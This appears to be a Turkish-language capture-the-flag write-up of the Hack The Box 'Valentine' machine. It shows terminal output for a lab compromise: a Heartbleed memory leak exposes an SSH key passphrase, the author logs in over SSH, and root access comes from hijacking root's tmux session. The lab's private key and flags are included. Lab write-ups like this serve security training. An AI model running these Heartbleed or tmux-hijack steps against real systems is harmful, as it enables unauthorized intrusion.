-----ENDRSAPRIVATEKEY-----
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat ssh-key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# ssh 10.10.10.79 -i ssh-key
Enter passphrase for key 'ssh-key':
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# /usr/share/john/ssh2john.py ssh-key
ssh-key:$sshng$1$16$AEB88C140F69BF2074788DE24AE48D46$1200$0db3eb3bbf247a036e9350c0aa500de636e35efd0f3eca20de375b3054bc884f69dd438bd25174c5fecfce6ae40daf11e72fdbe3afbd9c4a4231f4cf84db8945c5b653680970e147fbd4490c10b95093144b5fe08c1ffbfcccb4d0cc31f9a23ad0423449b3985005755b8115ee6f7a42c663af026f9e355a7e6e95b0a6933c11e9ba07004af32acfbe96e9a6d165e5e211bc3aea18c5980bb8033a9c33f92280d4453d8b8d897ad7b35c3f75e2c2a8227e11ad53f3395ab3a7dc9a133c03ef0f39704a35eea5d7b84a693eb0167a7979739a5081ef1e7bcee9270755646b67bd1f7297298a62f5c35dd381d77602219da472c9a585082393ee3bac7e2d2f27d6bfc658ca923848a63510f58ffe7dff8bb744ead308a7a8f43b1346ab3693548741d5b01706976d8c93d6ec403129791eaf4e0f91c9f06d11e8923946f08d5108f0c741484e38cc8e72c8a718ef7eaf84a74803d1473294a9baac266a69cc2749d7475bc5b72f12660b17715b996de5d3e30240584549e5f751120a20f867eb823a5ea32c50f691a38b7eec9e7b47d809bec64ea39eec498c0777c623049d5bc382f0d593930a6373410b6e551aeae94eb7d82b4a8b114c2b19775e0e3edb386cbb292b130c3ac8272a5a17be794f392c12a56cbd5a9eb2f175fcf85e34af19795ea8435018729350b760f3a20ee3ce9cc5da2297b57606f435d0f533d65048d50bc350c70863cfe09492c57ec159d0ca6809d626f160940e2814105503cb803cc7d5d971509e3c144f96cf2c2eb9b45b2da11b53675b92aee6a2dbb9314e72d0fb043cee531a75db3519035e1ac2927fc47faec44a79e29c8a50de3c28de68baadab19e136816d834331b7aaf681bd44025a10ea38394db8f927baae61764fca50658cda7d195a629cf7372a91edb6f81ba6d7e258412c6589f9c993e152bf50af4f2990ec40ad7136763ede5fe6eaeb9eb7e4e27a4ea1db0254d0d51b3d3ee96b4bb2b848b5fb9d8f3dfd1679a1241ed95591c9367515f9e0252b2ff7e31fbf3df8d656f33885a693b59f11c59c1dcd7a9fd57421b48d00b9e34e1bc470f9327b506c7d26ec7fd160b946648070279df44a906546d4e572bb073f2d58e66e16732b02e169944d77c1c433ce9f3688cfd3d9d58d3698b565179344a2d56d36c1bbb53732fed5383d2293722121421588d2aa2c86f9653b2302b7614e64a7708275849ccfadd0da941a7f17d26eebf808c9cda5d8ab54a128e674517cafe268bdd7d51dc3c55f1e49814a14bea9aa9b97718e58649180a7e271b27210f42172c48b7dd9fad7ce7b2386561af2cbdb54d35f93ff5fc97ea8a76e2b2f60f2112a58a67b2e90108506464758d37278dedbe46853542a1d1e1cc75457a14ee06ba7e56e3ea6aa0ef30255ed436426f832302332c95ffbdc4af935c42f789c98838145d3f2c3a7bf2654255519664a116923c79bffc56c4f22527be6fce77cee576a8bb2e2da04cc582a6dfecc40c80ef78a3cd69a59980472ac729420bfc14c945e5309e74370e8935530cf0b7828a2dce116974967f4bd5bfcd5e91e319af161c74e3a088a5079a8d532cb049e4c11766b04655c7f41ae4646e0573881d996fc8cd345481991b31064d2087f38f542e8a5455066fc5efa63f60cae69ccf64ff5c52188b24c02510fbde42187244f0c9210f7
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# /usr/share/john/ssh2john.py ssh-key > hash
Daha sonrasında passphrase'ı kırmayı denedim ancak başarılı olamadım ve heartbleed'e odkalandım. Proje sayfası: https://github.com/kudayDOTsite/heartbleed-poc
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# python2 heartbleed.py 10.10.10.79 -v
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.0
Waiting for Server Hello...
Received message: type = 22, version = 0x301, length = 66
Received message: type = 22, version = 0x301, length = 885
Received message: type = 22, version = 0x301, length = 331
Received message: type = 22, version = 0x301, length = 4
Received Server Hello for TLSv1.0
Sending heartbeat request...
Received message: type = 24, version = 0x301, length = 16384
Received heartbeat response...
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
[email protected][...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==;-.../..)....7{..~.n
Denemelerim sonucunda aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== veriisini yakaladım ve bunu dönüştürüdm.
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype
ssh ile bağlandım ve ilk flagimi aldım.
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# ssh [email protected] -i ssh-key
Enter passphrase for key 'ssh-key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ whoami
hype
hype@Valentine:~$ find /home -readable -type f -exec ls -al {} \; 2>/dev/null
-rw-r--r-- 1 hype hype 675 Dec 11 2017 /home/hype/.profile
-rw------- 1 hype hype 207 Dec 11 2017 /home/hype/.gnome2/keyrings/user.keystore
-rw------- 1 hype hype 105 Dec 11 2017 /home/hype/.gnome2/keyrings/login.keyring
-rw-rw-r-- 1 hype hype 104 Dec 11 2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3
-rw-rw-r-- 1 hype hype 8832 Dec 11 2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-3
-rw-rw-r-- 1 hype hype 12872 Dec 11 2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3
-rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history
-rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout
-rw-rw-r-- 1 hype hype 371 Dec 11 2017 /home/hype/.cache/unity-lens-video/videos.db
-rw-rw-r-- 1 hype hype 3683 Dec 11 2017 /home/hype/.cache/update-manager-core/meta-release-lts
-rw-rw-r-- 1 hype hype 541612 Dec 11 2017 /home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135
-rw-r--r-- 1 hype hype 3072 Dec 11 2017 /home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite
-rw-rw-r-- 1 hype hype 1978 Dec 11 2017 /home/hype/.cache/unity/migration_script.log
-rw------- 1 hype hype 1 Dec 11 2017 /home/hype/.cache/dconf/user
-rw-r--r-- 1 hype hype 0 Dec 11 2017 /home/hype/.cache/motd.legal-displayed
-rw-rw-r-- 1 hype hype 71 Dec 11 2017 /home/hype/.cache/indicators/messages/seen-db.keyfile
-rw-r--r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu
-rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc
-rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.Xauthority
-rw-rw-r-- 1 hype hype 5 Dec 11 2017 /home/hype/.config/user-dirs.locale
-rw------- 1 hype hype 632 Dec 11 2017 /home/hype/.config/user-dirs.dirs
-rw-rw-r-- 1 hype hype 1152 Dec 11 2017 /home/hype/.config/dconf/user
-rw-rw-r-- 1 hype hype 97 Dec 11 2017 /home/hype/.config/nautilus/desktop-metadata
-rw-rw-r-- 1 hype hype 3031 Dec 11 2017 /home/hype/.config/Trolltech.conf
-rw------- 1 hype hype 1024 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite
-rw------- 1 hype hype 281944 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-wal
-rw------- 1 hype hype 32768 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-shm
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseB
-rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB
-rw-rw-r-- 1 hype hype 28 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert
-rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.DB
-rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB
-rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA
-rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB
-rw-r--r-- 1 hype hype 19456 Dec 11 2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db
-rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/.converted-launchers
-rw------- 1 hype hype 38 Dec 11 2017 /home/hype/.local/share/telepathy/mission-control/accounts-goa.cfg
-rw-rw-r-- 1 hype hype 835 Dec 11 2017 /home/hype/.local/share/gsettings-data-convert
-rw------- 1 hype hype 1766 Dec 13 2017 /home/hype/.ssh/id_rsa
-rw------- 1 hype hype 222 Dec 13 2017 /home/hype/.ssh/known_hosts
-rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub
-rw------- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/authorized_keys
-rw------- 1 hype hype 115 Dec 11 2017 /home/hype/.gconf/apps/update-notifier/%gconf.xml
-rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/%gconf.xml
-rw------- 1 hype hype 384 Dec 11 2017 /home/hype/.gconf/apps/update-manager/%gconf.xml
-rw------- 1 hype hype 102 Dec 11 2017 /home/hype/.gconf/apps/nm-applet/%gconf.xml
-rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/%gconf.xml
-rw------- 1 hype hype 904 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml
-rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/%gconf.xml
-rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf
-rw------- 1 hype hype 21 Dec 11 2017 /home/hype/.mission-control/accounts/accounts.cfg
-rw------- 1 hype hype 12173 Dec 11 2017 /home/hype/.xsession-errors
-rw------- 1 hype hype 636 Dec 11 2017 /home/hype/.ICEauthority
-rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb
-rw-r--r-- 1 hype hype 12288 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb
-rw-r--r-- 1 hype hype 10 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink
-rw-r--r-- 1 hype hype 18 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source
-rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb
-rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks
-rw-rw-r-- 1 hype hype 33 Dec 13 2017 /home/hype/Desktop/user.txt
-rw------- 1 hype hype 256 Dec 11 2017 /home/hype/.pulse-cookie
-rw-rw-r-- 1 hype hype 463 Dec 11 2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0
-rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc
-rw------- 1 hype hype 9659 Dec 11 2017 /home/hype/.xsession-errors.old
hype@Valentine:~$
hype@Valentine:~$ cat /home/hype/Desktop/user.txt
e6710a5464769fd5fcd216e076961750
Daha sonrasında içeridei enum yapmak için çeşitli scriptler kullandım. /linpeas.sh işimi çözdü. Linpeas çıktısında dikkat çekici nokta aşağıda:
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.2 24432 2420 ? Ss Aug11 0:00 /sbin/init
root 302 0.0 0.0 17224 636 ? S Aug11 0:00 upstart-udev-bridge --daemon[0m
root 307 0.0 0.1 22008 1784 ? Ss Aug11 0:00 /sbin/udevd --daemon[0m
root 540 0.0 0.1 22004 1264 ? S Aug11 0:00 _ /sbin/udevd --daemon[0m
root 1085 0.0 0.1 22004 1268 ? S Aug11 0:00 _ /sbin/udevd --daemon[0m
syslog 553 0.0 0.1 249464 1500 ? Sl Aug11 0:01 rsyslogd -c5
102 566 0.0 0.1 24072 1248 ? Ss Aug11 0:00 dbus-daemon[0m --system --fork --activation=upstart
root 588 0.0 0.3 79036 3208 ? Ss Aug11 0:00 /usr/sbin/modem-manager
root 608 0.0 0.1 21180 1720 ? Ss Aug11 0:00 /usr/sbin/bluetoothd
avahi 622 0.0 0.0 32172 468 ? S Aug11 0:00 _ avahi-daemon[0m: chroot helper
root 630 0.0 0.6 174448 6624 ? Ssl Aug11 0:00 NetworkManager
root 641 0.0 0.3 104088 3948 ? Ss Aug11 0:00 /usr/sbin/cupsd -F
root 748 0.0 0.0 15180 396 ? S Aug11 0:00 upstart-socket-bridge --daemon[0m
root 817 0.0 0.3 203500 3896 ? Sl Aug11 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 922 0.0 0.2 49952 2848 ? Ss Aug11 0:00 /usr/sbin/sshd -D
hype 4887 0.0 0.1 92372 1668 ? S 02:07 0:00 _ sshd: hype@pts/0
hype 4888 0.2 0.8 31604 8684 pts/0 Ss 02:07 0:00 _ -bash
hype 5104 0.1 0.1 5096 1456 pts/0 S+ 02:09 0:00 _ /bin/sh ./linpeas.sh -a
hype 6141 0.0 0.1 5096 1028 pts/0 S+ 02:09 0:00 _ /bin/sh ./linpeas.sh -a
hype 6145 0.0 0.1 22464 1228 pts/0 R+ 02:09 0:00 | _ ps fauxwww
hype 6144 0.0 0.0 5096 856 pts/0 S+ 02:09 0:00 _ /bin/sh ./linpeas.sh -a
root 1011 0.0 0.0 19976 968 tty4 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty4
root 1020 0.0 0.0 19976 976 tty5 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty5
root 1026 0.0 0.0 19976 972 tty2 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty2
root 1027 0.0 0.0 19976 976 tty3 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty3
root 1029 0.0 0.1 26416 1676 ? Ss Aug11 0:13 /usr/bin/tmux -S /.devs/dev_sess
root 1033 0.0 0.4 20652 4588 pts/18 Ss+ Aug11 0:00 _ -bash
root 1038 0.0 0.0 19976 972 tty6 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty6
root 1058 0.0 0.0 4452 812 ? Ss Aug11 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root 1059 0.0 0.1 19104 1036 ? Ss Aug11 0:00 cron
daemon[0m 1060 0.0 0.0 16900 384 ? Ss Aug11 0:00 atd
whoopsie 1066 0.0 0.5 203064 5548 ? Ssl Aug11 0:00 whoopsie
root 1114 0.0 0.4 162284 4320 ? Sl Aug11 0:29 /usr/bin/vmtoolsd
root 1286 0.0 1.0 113124 10904 ? Ss Aug11 0:01 /usr/sbin/apache2 -k start
www-data 2582 0.0 0.8 113864 8488 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
www-data 2583 0.0 0.8 113864 8488 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
www-data 2584 0.0 0.8 113864 8484 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
www-data 2585 0.0 0.8 113868 8480 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
www-data 2586 0.0 0.8 113864 8492 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
www-data 3825 0.0 0.8 113864 8460 ? S Aug11 0:00 _ /usr/sbin/apache2 -k start
root 1457 0.0 0.0 19976 976 tty1 Ss+ Aug11 0:00 /sbin/getty -8 38400 tty1
root 1614 0.0 1.0 66916 10296 ? S Aug11 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 1649 0.0 0.5 510124 5464 ? Sl Aug11 0:14 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost
root 1677 0.0 0.3 584296 3892 ? Sl Aug11 0:00 /usr/sbin/console-kit-daemon[0m --no-daemon
Görüldüğü üzere tmux'da aktik bir session var. Ayrıca root haklarında...
hype@Valentine:/tmp$ tmux -S /.devs/dev_sess
root@Valentine:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/tmp# cd /root/
root@Valentine:~# ls
curl.sh root.txt
root@Valentine:~# cat root.txt
f1bb6d759df1f272914ebbc9ed7765b2
root@Valentine:~#
İlk Yorumu Siz Yapın